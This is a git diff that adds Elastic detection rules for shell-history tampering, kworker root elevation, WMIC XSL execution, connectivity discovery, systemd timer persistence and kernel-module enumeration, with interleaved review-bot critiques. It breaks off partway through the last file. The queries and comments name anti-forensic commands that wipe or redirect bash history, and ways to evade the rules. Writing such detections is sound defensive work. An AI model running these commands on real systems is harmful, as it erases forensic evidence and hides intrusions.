@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Tampering of Shell Command-Line History", + "query": "process where event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and event.type == \"start\" and\n (\n ((process.args : (\"rm\", \"echo\") or\n (process.args : \"ln\" and process.args : \"-sf\" and process.args : \"/dev/null\") or\n (process.args : \"truncate\" and process.args : \"-s0\"))\n and process.args : (\".bash_history\", \"/root/.bash_history\", \"/home/*/.bash_history\",\"/Users/.bash_history\", \"/Users/*/.bash_history\",\n \".zsh_history\", \"/root/.zsh_history\", \"/home/*/.zsh_history\", \"/Users/.zsh_history\", \"/Users/*/.zsh_history\")) or\n (process.name : \"history\" and process.args : \"-c\") or\n (process.args : \"export\" and process.args : (\"HISTFILE=/dev/null\", \"HISTFILESIZE=0\")) or\n (process.args : \"unset\" and process.args : \"HISTFILE\") or\n (process.args : \"set\" and process.args : \"history\" and process.args : \"+o\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) 
for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.003", + "name": "Clear Command History", + "reference": "https://attack.mitre.org/techniques/T1070/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json new file mode 100644 index 00000000000..06b3f2d83f2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2.json 
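Review bot: The `truncate` branch of the query in 7bcbb3ac, `process.args : "truncate" and process.args : "-s0"`, only matches when the size is glued to the flag; the equally common `truncate -s 0 ~/.bash_history` produces the separate arguments `-s` and `0` and is missed, as is `--size=0`. Since the history-path condition already anchors the match, widening it to `(process.args : "truncate" and process.args : ("-s0", "-s", "--size=*"))` closes that gap without adding noise; the same applies to the `ln` branch, where `-s -f` as two arguments does not satisfy `process.args : "-sf"`. Also note that `history -c`, `export HISTFILE=/dev/null`, `unset HISTFILE` and `set +o history` are shell builtins that never exec, so on the exec-event sources listed in `index` those branches can presumably only fire when the command is passed to an interpreter in a form that keeps the words as separate arguments; if that is intended, a sentence in `description` or a `false_positives`/limitations entry would save analysts from assuming interactive use of those builtins is covered.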
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through the kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process, and hijack the execution flow by hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Kworker UID Elevation", + "query": "process where host.os.type == \"linux\" and event.action == \"session_id_change\" and process.name : \"kworker*\" and\nuser.id == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2", + "type": "security-rule" +} \ No newline at end of file 
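Review bot: The ATT&CK mapping in 7dfaaa17 lists sub-technique T1574.013 "KernelCallbackTable", which ATT&CK scopes to Windows (it abuses the PEB KernelCallbackTable) and does not describe a Linux rootkit masquerading as a kernel worker; the T1014 Rootkit entry already present is the accurate one, and if a second mapping is wanted, T1036.004 "Masquerade Task or Service" under Defense Evasion fits the kworker-name aspect that the description actually talks about. Separately, the rule is named "Suspicious Kworker UID Elevation" and the description speaks of elevating a regular user to root, but the query `event.action == "session_id_change" and process.name : "kworker*" and user.id == "0"` is a single-event match that only sees the post-change state and never compares against a prior non-root UID; unless the endpoint source guarantees that genuine kernel threads emit no `session_id_change` events (I cannot confirm that from the rule alone), a sentence in `description` clarifying that the rule keys on a root-owned, user-space process carrying a kworker name at session change, not on an observed UID transition, would prevent over-reading the alert.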
diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json new file mode 100644 index 00000000000..96b525ec9e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json 
@@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMIC XSL Script Execution", + "query": "sequence by process.entity_id with maxspan = 2m\n[process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : (\"* /format:table *\", \"* /format:table\")]\n[any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : (\"jscript.dll\", \"vbscript.dll\") or file.name : (\"jscript.dll\", \"vbscript.dll\"))]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json new file mode 100644 index 00000000000..80ff4defcb9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools attackers can use to check for Internet connectivity on compromised systems. These results may be used to determine communication capabilities with C2 servers, or to identify routes, redirectors, and proxy servers.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Discovery of Internet Capabilities via Built-in Tools", + "new_terms_fields": [ + "host.id", + "user.id", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and \nprocess.name.caseless:(\"ping.exe\" or \"tracert.exe\" or \"pathping.exe\") and\nnot process.args:(\"127.0.0.1\" or \"0.0.0.0\" or \"localhost\" or \"::1\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "7f89afef-9fc5-4e7b-bf16-75ffdf27f8db", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": 
[ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 102 + }, + "id": "7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json new file mode 100644 index 00000000000..6f442916fd8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json 
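Review bot: The query in 7f89afef keys solely on `process.name.caseless:("ping.exe" or "tracert.exe" or "pathping.exe")`, so a copied or renamed binary evades it, whereas the neighbouring Windows discovery rule in this same patch (7b8bfc26) pairs the name check with `process.pe.original_file_name`; adding `or process.pe.original_file_name:("ping.exe" or "tracert.exe" or "pathping.exe")` (assuming, as I believe, that these system binaries carry their own name in the PE version resource) would bring this rule in line at no cost to its low-severity BBR intent. The `required_fields` entry for `process.name.caseless` is emitted as `"ecs": false, "type": "unknown"`, which reads as a schema gap; a short note in `setup` that the `.caseless` subfield is an Elastic Defend mapping (consistent with `index` being limited to `logs-endpoint.events.*`) would tell a user why the rule cannot simply be pointed at other Windows process sources.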
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Timer Created", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not (\n (process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\" or \"pacman\" or \"podman\" or \n \"pamac-daemon\"\n ))\n or (file.name:apt-*.timer)\n)\n", + "references": [ + "https://opensource.com/article/20/7/systemd-timers", + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7fb500fa-8e24-4bd1-9480-2a819352602c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.006", + "name": "Systemd Timers", + "reference": "https://attack.mitre.org/techniques/T1053/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "7fb500fa-8e24-4bd1-9480-2a819352602c_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json new file mode 100644 index 00000000000..3d2db72e0b7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json 
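Review bot: The first osquery block in the investigation guide of 7fb500fa hard-codes `path LIKE '/home/user/.config/systemd/user/%'`, while the second block in the same guide correctly uses the placeholder `'/home/{{user.name}}/.config/systemd/user/%'`; the literal `user` looks like a leftover placeholder and will silently return nothing on a real host, so the first query should use `path LIKE '/home/{{user.name}}/.config/systemd/user/%'` as well. Both queries and the detection query's `file.path` list also omit standard unit search paths that the description claims to cover ("any of the default systemd timer directories"): `/etc/systemd/user/*`, `/usr/lib/systemd/user/*`, `/run/systemd/system/*` and root's own `/root/.config/systemd/user/*`; if some are excluded deliberately for noise reasons, the description should say "the main system and per-user directories" rather than "any".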
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules via Proc", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. 
It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "80084fa9-8677-4453-8680-b891d3c0c778_105", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json
new file mode 100644
index 00000000000..4b694d1b55f
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules via Proc", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\" and\nnot process.name:(grep or python* or chef-client)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + 